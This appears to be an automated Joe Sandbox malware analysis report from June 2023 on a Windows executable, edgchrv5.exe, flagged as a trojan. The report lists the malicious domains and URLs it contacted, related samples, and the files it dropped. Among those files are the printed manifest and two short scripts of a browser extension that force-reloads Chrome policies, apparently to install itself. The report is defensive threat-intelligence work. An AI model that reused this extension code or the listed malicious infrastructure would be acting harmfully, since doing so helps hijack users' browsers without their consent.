Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Windows Management Instrumentation	11 Browser Extensions	11 Process Injection	1 Masquerading	1 Input Capture	1 System Time Discovery	Remote Services	1 Input Capture	Exfiltration Over Other Network Medium	11 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Disable or Modify Tools	LSASS Memory	1 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	3 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	2 Native API	Logon Script (Windows)	Logon Script (Windows)	11 Process Injection	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Man in the Browser	Automated Exfiltration	4 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Deobfuscate/Decode Files or Information	NTDS	23 System Information Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	5 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
edgchrv5.exe	29%	ReversingLabs	Win32.Trojan.Generic
edgchrv5.exe	35%	Virustotal		Browse
edgchrv5.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
campaignkeepy.buzz	0%	Virustotal	Browse
getfiles.wiki	2%	Virustotal	Browse
exturl.com	0%	Virustotal	Browse
campaignkejfcv.buzz	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
https://getfiles.wiki/welcome.php~	0%	Avira URL Cloud	safe
https://campaignkejfcv.buzz/r.php?payout=OPTIONAL&cnv_id=OPTIONAL	0%	Avira URL Cloud	safe
https://campaignkejfcv.buzz/	0%	Avira URL Cloud	safe
https://getfiles.wiki/welcome.php&Svh&	0%	Avira URL Cloud	safe
https://getfiles.wiki/redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzc=	100%	Avira URL Cloud	malware
https://getfiles.wiki/favicon.ico	0%	Avira URL Cloud	safe
https://getfiles.wiki/welcome.phpFp1	0%	Avira URL Cloud	safe
https://getfiles.wiki/welcome.php%s	0%	Avira URL Cloud	safe
https://getfiles.wiki/welcome.phpX	0%	Avira URL Cloud	safe
https://campaignkeepy.buzz/r.php?payout=OPTIONAL&cnv_id=OPTIONAL	0%	Avira URL Cloud	safe
https://campaignkeepy.buzz/	0%	Avira URL Cloud	safe
https://getfiles.wiki/redirect.php?gjhagdjfbdjk=	100%	Avira URL Cloud	malware
https://getfiles.wiki/redirect.php	100%	Avira URL Cloud	malware
https://exturl.com/r.php?key=pvwarw3	0%	Avira URL Cloud	safe
https://getfiles.wiki/welcome.php	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
a.nel.cloudflare.com	35.190.80.1	true	false		high
accounts.google.com	216.58.215.237	true	false		high
api4.ipify.org	173.231.16.76	true	false		high
campaignkeepy.buzz	38.128.66.115	true	false	0%, Virustotal, Browse	unknown
getfiles.wiki	188.114.97.7	true	false	2%, Virustotal, Browse	unknown
t.dtscout.com	141.101.120.10	true	false		high
www3.l.google.com	142.250.203.110	true	false		high
s4.histats.com	149.56.240.132	true	false		high
campaignkejfcv.buzz	38.128.66.115	true	false	0%, Virustotal, Browse	unknown
e.dtscout.com	141.101.120.10	true	false		high
www.google.com	216.58.215.228	true	false		high
clients.l.google.com	172.217.168.14	true	false		high
exturl.com	38.128.66.115	true	false	0%, Virustotal, Browse	unknown
clients2.google.com	unknown	unknown	false		high
chrome.google.com	unknown	unknown	false		high
api.ipify.org	unknown	unknown	false		high
s10.histats.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://campaignkejfcv.buzz/r.php?payout=OPTIONAL&cnv_id=OPTIONAL	false	Avira URL Cloud: safe	unknown
https://t.dtscout.com/pv/?_a=v&_h=getfiles.wiki&_ss=ng6jfd0g1c&_pv=1&_ls=0&_u1=1&_u3=1&_cc=ch&_pl=d&_cbid=15t7&_cb=_dtspv.c	false		high
https://api.ipify.org/?format=jsonp&callback=getIP	false		high
https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard	false		high
https://chrome.google.com/webstore/inlineinstall/detail/ecffbknobglofafinobbcmaionnihcma	false		high
https://getfiles.wiki/redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzc=	false	Avira URL Cloud: malware	unknown
https://s4.histats.com/stats/0.php?4708787&@f16&@g1&@h1&@i1&@j1686622029954&@k0&@l1&@m&@n0&@ohttps%3A%2F%2Fgetfiles.wiki%2Fredirect.php&@q0&@r0&@s0&@ten-US&@u1280&@b1:199562055&@b3:1686622030&@b4:js15_as.js&@b5:-420&@a-_0.2.1&@vhttps%3A%2F%2Fgetfiles.wiki%2Fredirect.php%3Fgjhagdjfbdjk%3DMTAyLjEyOS4xNDMuNzc%3D&@w	false		high
https://getfiles.wiki/favicon.ico	false	Avira URL Cloud: safe	unknown
https://campaignkeepy.buzz/r.php?payout=OPTIONAL&cnv_id=OPTIONAL	false	Avira URL Cloud: safe	unknown
https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1	false		high
https://getfiles.wiki/redirect.php	false	Avira URL Cloud: malware	unknown
https://e.dtscout.com/e/?v=1a&pid=5200&site=1&l=https%3A%2F%2Fgetfiles.wiki%2Fredirect.php%3Fgjhagdjfbdjk%3DMTAyLjEyOS4xNDMuNzc%3D&j=https%3A%2F%2Fgetfiles.wiki%2Fredirect.php	false		high
https://exturl.com/r.php?key=pvwarw3	false	Avira URL Cloud: safe	unknown
https://getfiles.wiki/welcome.php	false	Avira URL Cloud: malware	unknown
https://a.nel.cloudflare.com/report/v3?s=qDygGzpyVf%2FvXRZ8%2B8g7Doys1Hqvo9OGEGOztGaigdYFHOxl5%2BCHxGfDS%2FHsIBI%2FGtFnZCUdpiP6cmTWPUdk3BtIDngxQmeZkYkp%2B0JxsD05i5KWS9BqX9jj5M08v1L3	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.ipify.org?format=jsonp&callback=getIP	chromecache_131.4.dr	false		high
https://getfiles.wiki/welcome.php~	edgchrv5.exe, 00000000.00000002.397704318.0000000001485000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://getfiles.wiki/welcome.php&Svh&	edgchrv5.exe, 00000000.00000002.397704318.0000000001485000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://campaignkejfcv.buzz/	chromecache_132.4.dr	false	Avira URL Cloud: safe	unknown
https://t.dtscout.com/pv/	chromecache_133.4.dr	false		high
https://getfiles.wiki/welcome.php%s	edgchrv5.exe, 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
https://getfiles.wiki/welcome.phpFp1	edgchrv5.exe, 00000000.00000002.397704318.000000000144A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://getfiles.wiki/welcome.phpX	edgchrv5.exe, 00000000.00000002.397704318.0000000001485000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://campaignkeepy.buzz/	chromecache_132.4.dr	false	Avira URL Cloud: safe	unknown
https://getfiles.wiki/redirect.php?gjhagdjfbdjk=	chromecache_131.4.dr	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
216.58.215.228	www.google.com	United States	15169	GOOGLEUS	false
141.101.120.10	t.dtscout.com	European Union	13335	CLOUDFLARENETUS	false
216.58.215.237	accounts.google.com	United States	15169	GOOGLEUS	false
149.56.240.132	s4.histats.com	Canada	16276	OVHFR	false
38.128.66.115	campaignkeepy.buzz	United States	63023	AS-GLOBALTELEHOSTUS	false
142.250.203.110	www3.l.google.com	United States	15169	GOOGLEUS	false
188.114.97.7	getfiles.wiki	European Union	13335	CLOUDFLARENETUS	false
172.217.168.14	clients.l.google.com	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
35.190.80.1	a.nel.cloudflare.com	United States	15169	GOOGLEUS	false
173.231.16.76	api4.ipify.org	United States	18450	WEBNXUS	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	37.1.0 Beryl
Analysis ID:	886159
Start date and time:	2023-06-12 19:06:06 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 4m 58s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	edgchrv5.exe
Detection:	MAL
Classification:	mal48.phis.winEXE@37/11@14/12
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 73.5% (good quality ratio 67.5%) Quality average: 74.9% Quality standard deviation: 30.8%
HCA Information:	Successful, ratio: 97% Number of executed functions: 34 Number of non-executed functions: 10
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 216.58.215.227, 34.104.35.123, 104.20.5.29, 104.20.4.29
Excluded domains from analysis (whitelisted): edgedl.me.gvt1.com, ctldl.windowsupdate.com, clientservices.googleapis.com, s10.histats.com.cdn.cloudflare.net
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
19:07:02	API Interceptor	1x Sleep call for process: edgchrv5.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
141.101.120.10	TeamViewer 15.40.exe	Get hash	malicious	Unknown	Browse
	https://sicurezza.info.85-217-144-202.cprapid.com/22-23app/	Get hash	malicious	Unknown	Browse
	http://www.sihebshost.com/pp-app/login/accedi.php	Get hash	malicious	Unknown	Browse
	https://claimnow12.finance.blog/cara-credit-union/	Get hash	malicious	Unknown	Browse
	http://securelogin.185-254-37-231.cprapid.com/it	Get hash	malicious	Unknown	Browse
	http://law.jaknet.my.id	Get hash	malicious	Unknown	Browse
	https://verifica.dati.79-137-206-206.cprapid.com/dp/	Get hash	malicious	Unknown	Browse
	$RLFVMMG.exe	Get hash	malicious	Unknown	Browse
	http://s953497062.onlinehome.us/fixit?_recovrAccount	Get hash	malicious	Unknown	Browse
	http://148.69.140.59:88/dak.php	Get hash	malicious	Unknown	Browse
	https://certificate.dokument.35-158-186-246.cprapid.com/id/dklogin.php	Get hash	malicious	Unknown	Browse
149.56.240.132	https://city-of-goodyear.webnode.page/	Get hash	malicious	Unknown	Browse
38.128.66.115	TeamViewer 15.40.exe	Get hash	malicious	Unknown	Browse
	TriMPFPatch56form20230426.exe	Get hash	malicious	Unknown	Browse
	luxor - pharaoh's challenge.exe	Get hash	malicious	Unknown	Browse
	$RDGU87D.exe	Get hash	malicious	Unknown	Browse
	$RLFVMMG.exe	Get hash	malicious	Unknown	Browse
	inno-chrome-malware.exe	Get hash	malicious	Unknown	Browse
	inno-chrome-malware.exe	Get hash	malicious	Unknown	Browse
	inno-chrome-malware.exe	Get hash	malicious	Unknown	Browse
	inno-chrome-malware.exe	Get hash	malicious	Unknown	Browse
	inno-chrome-malware.exe	Get hash	malicious	Unknown	Browse
	Your File Is Ready To Download.exe	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
getfiles.wiki	TeamViewer 15.40.exe	Get hash	malicious	Unknown	Browse	188.114.97.7
	TriMPFPatch56form20230426.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	luxor - pharaoh's challenge.exe	Get hash	malicious	Unknown	Browse	188.114.97.7
	$RDGU87D.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	$RLFVMMG.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	inno-chrome-malware.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	inno-chrome-malware.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	inno-chrome-malware.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	inno-chrome-malware.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	inno-chrome-malware.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	Your File Is Ready To Download.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
campaignkeepy.buzz	TeamViewer 15.40.exe	Get hash	malicious	Unknown	Browse	38.128.66.115
api4.ipify.org	INV67758ASP1_and_Bank_details.exe	Get hash	malicious	AgentTesla	Browse	64.185.227.155
	mMG78nF0L2.exe	Get hash	malicious	AgentTesla, zgRAT	Browse	64.185.227.155
	39MHMKDcWF.exe	Get hash	malicious	AgentTesla	Browse	64.185.227.155
	Listed_specification.vbs	Get hash	malicious	AgentTesla	Browse	64.185.227.155
	hesaphareketi-01.exe	Get hash	malicious	AgentTesla, zgRAT	Browse	173.231.16.76
	INVIbwZyQ2.exe	Get hash	malicious	AgentTesla	Browse	104.237.62.211
	3t7DoZ25Dn.exe	Get hash	malicious	AgentTesla	Browse	173.231.16.76
	Doc_206410002pdf.exe	Get hash	malicious	AgentTesla	Browse	173.231.16.76
	Purchase_Order_2023.0608.pdf.exe	Get hash	malicious	AgentTesla	Browse	64.185.227.155
	shipping_documents.exe	Get hash	malicious	AgentTesla	Browse	173.231.16.76
	Transfer_copy.exe	Get hash	malicious	AgentTesla	Browse	104.237.62.211
	SWIFT_COPY.exe	Get hash	malicious	AgentTesla, NSISDropper	Browse	104.237.62.211
	SWIFT_56650XXXX_0716NSMI0015024.exe	Get hash	malicious	AgentTesla	Browse	104.237.62.211
	Quote_EM092723.exe	Get hash	malicious	AgentTesla, zgRAT	Browse	104.237.62.211
	Order_confirmation_#872635.exe	Get hash	malicious	AgentTesla	Browse	104.237.62.211
	hqz11PiSIS.exe	Get hash	malicious	AgentTesla, zgRAT	Browse	64.185.227.155
	Halkbank_Ekstre_20230906_081655_924962.pdf.exe	Get hash	malicious	AgentTesla	Browse	104.237.62.211
	DQ0LGV4D8v.exe	Get hash	malicious	AgentTesla	Browse	104.237.62.211
	4S1jIYaMSJ.exe	Get hash	malicious	AgentTesla	Browse	173.231.16.76
	DHL_-_OVERDUE_ACCOUNT_NOTICE_-_8311493658_PDF.exe	Get hash	malicious	AgentTesla, zgRAT	Browse	64.185.227.155

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://filehippo.com/download_xumouse	Get hash	malicious	RedAlert	Browse	104.18.25.173
	phish_alert_sp2_2.0.0.0 (29).eml	Get hash	malicious	HTMLPhisher	Browse	104.16.125.175
	MatrixHackByFilard.exe	Get hash	malicious	AveMaria, Clipboard Hijacker, StormKitty	Browse	104.18.115.97
	http://captchawizard.top	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://ncv.microsoft.com/tGglVSDwU8	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://9a58319fdb89454dbf7d57ec64124460.svc.dynamics.com/t/t/BVzG1ZtcxfxVMEeCBMUF9f98xaJT8P62o5RV0yU9XwAx/uDcWdH1bOp6HWDY2mkAOv9iB1YD3eKJ5Fgcioqsxn5Yx	Get hash	malicious	Unknown	Browse	104.18.28.38
	download message reports.htm	Get hash	malicious	HTMLPhisher	Browse	104.18.11.207
	https://sdsphyphthkydthphu.lt.emlnk.com/Prod/link-tracker?notrack=1&redirectUrl=aHR0cHMlM0ElMkYlMkZpcGZzLmlvJTJGaXBmcyUyRlFtWFhzVWNFalVXUjJ0UlRlZW9TbTNaQ1BldnV6d1dqdThxYWNKZzQ2Q2ZFdnklMkYlM0Z1JTNERjI2NkY0RCUyNmUlM0QxNUVCNUI5JTI2YyUzRDE3QUIxNiUyNnQlM0QxJTI2bCUzREE4OThDQTREJTI2ZW1haWwlM0RKVTV4dzZ1RzhZUWZJSFRPbFZ3TG4xJTI1MjUyQlRZYTNXdFdObSUyNnNlcQ==&sig=HmweUoib5nYo7eyqKXNnGYAgaeE2FfdWf8cXk4vgMHH9&iat=1686562798&a=%7C%7C226436143%7C%7C&account=sdsphyphthkydthphu%2Eactivehosted%2Ecom&email=wqoeHBR35e%2BSVLN%2F%2FiKISDXjmjj%2FzFr01chOjGPcASlmhkzkym5PzH%2FTG%2Fs2pA%3D%3D%3AYiPRmc8seEqZ3k4hYzXtexzYrsJacX%2Bf&s=b2601602628213a189f35061271e9bbe&i=1A3A1A8#Y29sZS5kaXBsb2NrQHZpaGEuY2E=	Get hash	malicious	HTMLPhisher	Browse	1.1.1.1
	https://corwinbeverage-my.sharepoint.com/:b:/g/personal/seano_corwinbevco_com/EasgJ5ZT7F9Ivgi8cYRzRacB9ebkDP9W3ssv_FjrHl59tQ?e=rqjRKm	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	https://coloursatelec.com/siim/?alt=media&token=033982e3-60ca-457e-b182-18a03119de12&data=YnJvY2h1cmVAcm9ja3ltb3VudGFpbmVlci5jb20=&subf=Open%20Vacations.pdf&foldr=Human%20Resources&file=Vacation_Submissions.pdf	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://clicktime.symantec.com/3SV6pqrZcECzT369dA96VwE7VN?u=https://surewayconsultants.com/_wildcard_.surewayconsultants.com/index.php/?bmF0YWxpZS50aWxsZXlAY290ZXJyYS5jb20=	Get hash	malicious	HTMLPhisher	Browse	104.16.124.175
	HEUR-Trojan.Win32.Chapak.gen-774ae4107d461361.exe	Get hash	malicious	Amadey, Fabookie, Nymaim, PrivateLoader, RedLine, SmokeLoader, Tofsee	Browse	188.114.97.7
	file.exe	Get hash	malicious	MinerDownloader, Xmrig	Browse	172.67.34.170
	https://gator3403.hostgator.com:2096	Get hash	malicious	HTMLPhisher	Browse	104.18.28.38
	https://ipfs.io/ipfs/bafybeibtqlw6fb2s4sang4bhsiuhw6ucgzlxgrfi5gqmhhuoirwzgllm24/phantom1248.html#0032@de.atu.eu	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://ipfs.io/ipfs/QmP9aHN6SFr3Mdit2UqKy3BoAVuo3Fmp2mDRSBNS4aaXBe/#norautoitaliapec.hr@legalmail.it	Get hash	malicious	HTMLPhisher	Browse	104.18.169.114
	https://workflowy.com/s/incoming-encrypted-d/dqMyV8TZmqYE4euJ	Get hash	malicious	HTMLPhisher	Browse	172.67.71.92
	http://robustus.impactia.com/AnalyticServer/redirect?cid=1c8ba94477e44657&mid=99825379&eurl=aHR0cHM6Ly9lYXRjb21taXRtZW50LnNhLmNvbS9kYW5rYS9pbmRleC5waHA/cmQ9YW5rdXIua290aGFyaUBhdXRvbWF0aW9uYW55d2hlcmUuY29t	Get hash	malicious	Unknown	Browse	104.21.16.6
	Settled Payment #Copy#U00ae .html	Get hash	malicious	HTMLPhisher	Browse	172.67.201.145
	https://ipfs.io/ipfs/bafybeigjj3mrx2fbaiopasqeezuoq26hnbigiszkqpiiiclo5plsk3eyuq/fraramzi0_sp_chamtop.html#nfornes@mgts.com	Get hash	malicious	HTMLPhisher	Browse	172.64.202.28
OVHFR	file.exe	Get hash	malicious	RedLine	Browse	147.135.231.58
	https://x7e7z6tm3emgcl6ob2uxejgh2bieto3flprfragwdy-ipfs-dweb-link.translate.goog/?_x_tr_hp=bafybeic3plmzw643&_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-US#adefa@asdf.fr	Get hash	malicious	HTMLPhisher	Browse	46.105.46.142
	file.exe	Get hash	malicious	RedLine	Browse	147.135.231.58
	unknown.exe	Get hash	malicious	Emotet	Browse	51.255.165.160
	mMCcAhCxUk.exe	Get hash	malicious	AveMaria, UACMe	Browse	51.210.66.231
	file.exe	Get hash	malicious	RedLine	Browse	147.135.231.58
	file.exe	Get hash	malicious	RedLine	Browse	147.135.231.58
	file.exe	Get hash	malicious	RedLine	Browse	147.135.231.58
	file.exe	Get hash	malicious	RedLine	Browse	147.135.231.58
	file.exe	Get hash	malicious	RedLine	Browse	147.135.231.58
	file.exe	Get hash	malicious	Xmrig	Browse	51.255.34.118
	file.exe	Get hash	malicious	RedLine	Browse	147.135.231.58
	https://salamat-bo.com/zag	Get hash	malicious	Unknown	Browse	54.37.93.154
	https:/agmconsulting.fr/api.php?_somtc=true&rtoken=f37af7c5-099b-49d4-bbed-04dd78eb6dfc-42a9e&remail=laurent.delaunay@jda.com	Get hash	malicious	Unknown	Browse	54.36.91.62
	r62hEGJs3L.elf	Get hash	malicious	Mirai	Browse	149.60.183.114
	emotetno-aslr - Copy.exe	Get hash	malicious	Emotet	Browse	51.255.165.160
	Agrubu_06092023.pdf.exe	Get hash	malicious	FormBook, NSISDropper	Browse	139.99.8.190
	v46ktHyluW.exe	Get hash	malicious	RedLine	Browse	51.79.184.226
	QUOTATION.exe	Get hash	malicious	FormBook, GuLoader	Browse	51.91.236.255
	file.exe	Get hash	malicious	RedLine	Browse	147.135.231.58

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\ServiceApp\apps-helper\edge.crx

Download File

Process:	C:\Users\user\Desktop\edgchrv5.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	46654
Entropy (8bit):	7.9590350147638365
Encrypted:	false
SSDEEP:	768:os7cjcBjsI/hbTTWJpuHlKElAfPryn5QzShaPuChbhFbHRu/llKGr7J9FwyIlWgT:oshv5HquHgElAfzyneSMPuKbvzUllKGY
MD5:	2BA2554244EA500AA5847F1FF7A9D26C
SHA1:	DEBA543755C488CDC7A3BEE7CD46E7FE4B7F1212
SHA-256:	8B7D4B43A9EEBC6C3FC78DEA1AB562711651FC24043F260018C80021B33FBC4B
SHA-512:	104FBB55F037015FFB02025A3F663C29D0D113DBF72AFCF9A9D1D7C0D20013E3A72905A5B2EEACCDD23828C0DA1855FB852CB7AA74535BF7EB0A5854E6877311
Malicious:	false
Preview:	Cr24....E.........0.."0....H.............0............-.."a....7.@M....lVa...$E.F...\|..l.5<o4_...P....5.1K.[.S.......Y.GJ.Na{.x~\|.........d7$...J...n.....,..tV.0.\|..2..~..?...._G.2.&.....z.3..\|{...-I......f..,{q..h6E..l.\..Zz......hFs...1bU..UyS.c....]..L)-..~7.lz.:.D.............!..{0.G........f...O.{a...<......p1.%_...$PV....M..V...G.....m:..B....+...w.~.\|"......`^....L....;P."...k.r.!{...=.A..'.._+...,M.L.....y.......B....{.#.....+4.c6.A K...o.!\.e.<.j.0...Z.5Qa.\!..aZ.YO......A(.x...o...Y....u....tR\|z.w..u.....i.K'._r..V2-.r..3.@&.......BU....PX..,...r.PK..-.......OV...[............manifest.json.....................SMo.0...W...(.9n..h.a.......!3.#W..%.....I.]wK..f?>>R...".r...Y...m^D.d.....:a[.@.w#>..w{C..-k=.j.Y.m....Q..#)a...._........f........u.b.!....xc.o0......<@.C...CK..m..<. ..`.h..S....d. p*..IW.:=wn7......8...3...$.\|..)..?.X~,.b.,.....c....bJ..uqY.. ...Q.u.v..%B^..E[......8..qJ.Fg...V.b.Pa>..[`.cFJ..v....M..7)...8ipiyj..a...5.5../..

C:\Users\user\AppData\Local\ServiceApp\apps-helper\manifest.json

Download File

Process:	C:\Users\user\Desktop\edgchrv5.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	273
Entropy (8bit):	4.76438627845756
Encrypted:	false
SSDEEP:	6:EW/COIk/hsu1wC6VAPk8yyWSD9kn+E8Lyg8c:r6OJhsu1wXAPk8Sic+EaPN
MD5:	99F8D6AA35E67DB20B5F6E3FC54101CE
SHA1:	37E09293AA7CDB8FAE7754AAAE3E8BD2591A2F29
SHA-256:	CC1C1C7AA14AC707F66629095B8E117109660C13511F26D6EEDA1E9FDC363AB2
SHA-512:	57562DBE3C33139B98FF244CDCC233C9689823A11032D42B9B179EDA53831481422D69A62691EEBFF34C0AE85C36CBE7F8B16599D89919BAB759CFD38AF27797
Malicious:	false
Preview:	{..."name": "Apps",..."description": "",..."version": "1.0",..."manifest_version": 3,..."background": {...."service_worker": "service.js",...."type": "module"...},..."permissions": ["tabs", "scripting", "management", "background"],..."host_permissions": ["chrome:///"]..}

C:\Users\user\AppData\Local\ServiceApp\apps-helper\service.js

Download File

Process:	C:\Users\user\Desktop\edgchrv5.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	320
Entropy (8bit):	5.073881670663314
Encrypted:	false
SSDEEP:	6:YXOBLow3rzLI/Dg5EVNR21aMXgBDoQYIxXYMoVsxrHLLqL:Y+9otk5EgIMIDVYVMjrSL
MD5:	1FE579C153AE40CF460615BD79DA3ED0
SHA1:	EFB41E8B7AA825101EC6856287A655C448483857
SHA-256:	DCF80F0A803A85A3334272B07A545BF154116EFCD9F9E5D9340763BE11B0EA79
SHA-512:	992074BA16132DC5147BEF6869DCB99E60BC58D71A6E70B59B540F0133E4FC78D3C7385960A334A5A8C14F1AC362589AF4D008872A93591AC65314D94DE20084
Malicious:	false
Preview:	chrome.management.onInstalled.addListener(info => {...if (info.id != 'ecffbknobglofafinobbcmaionnihcma') return;.....setTimeout(() => {....chrome.tabs.create({ url: 'chrome://policy' }, tab => {.....chrome.scripting.executeScript({......target: { tabId: tab.id },......files: ['web.js'].... });....});...}, 500);..});

C:\Users\user\AppData\Local\ServiceApp\apps-helper\web.js

Download File

Process:	C:\Users\user\Desktop\edgchrv5.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	299
Entropy (8bit):	4.8969499354657176
Encrypted:	false
SSDEEP:	6:oJRoJfwejEzKeYDFOEn9zmYnadRv5F8smvDNRU/snproLNRiif:ofoJYejj9n9Sdx5msmvDLrKdf
MD5:	78DA8C3C7BCC4FCBE1D1C1D4209BA026
SHA1:	CCACDA33826629E3A5B552BA26227D9D1B026BCA
SHA-256:	893FCFE4EDCDB07BCC3E05A3304F93F0358C9D8F4CC967058585F553BB82AD02
SHA-512:	01C3DEF2B9A38ABD5C6D447C52D8EC3533C8098DB69DCF30682EFA992BE71666D66A56AB3E6B161F8017FE018E20E479C365B780F3CF94ED507CAEA99EADBC06
Malicious:	false
Preview:	addEventListener('load', () => {...if (location.host !== 'policy') return;.....const reload = () => {....const button = document.querySelector('#reload-policies');......if (button) {.....button.click();.....setTimeout(close, 200);....} else {.....setTimeout(reload, 200);....}...}.....reload();..});

Chrome Cache Entry: 127

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	51
Entropy (8bit):	4.740861126200381
Encrypted:	false
SSDEEP:	3:QBRgyNq/HG9AQrU7Cfr4GfwY:IgymGfrUZGfwY
MD5:	BA26AAE4486011FB8D43146D2CE4269C
SHA1:	8D9CD7748DB38852B73C3205AC07583975DDE74B
SHA-256:	8420CEBD83E2EAECEA1085412FD4D1069EB88697BB8E41CC6ED9AFB60C598E51
SHA-512:	4D363AC65C76DC11AB120E3963F39E86E8857725AA7CB0E0DFED516BD0CDA1819EF1D4D663E0DDE66E271991E5D3982ACDD87CEBDA28E37940602C95A976162C
Malicious:	false
URL:	https://t.dtscout.com/pv/?_a=v&_h=getfiles.wiki&_ss=ng6jfd0g1c&_pv=1&_ls=0&_u1=1&_u3=1&_cc=ch&_pl=d&_cbid=15t7&_cb=_dtspv.c
Preview:	try{_dtspv.c({"b":"chrome@104"},'15t7');}catch(e){}

Chrome Cache Entry: 128

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	380
Entropy (8bit):	5.245911680799567
Encrypted:	false
SSDEEP:	6:51bDNRdhb13LkVVXI8mgO9lVhnmUqZzwGdDVTYqL1+LD+mMkuc1zlCBbAm+RbDRk:51bDR513QvuHnmVZkGdDJH10D+xc15C5
MD5:	7CED556545225D5937749464A6BA4C0D
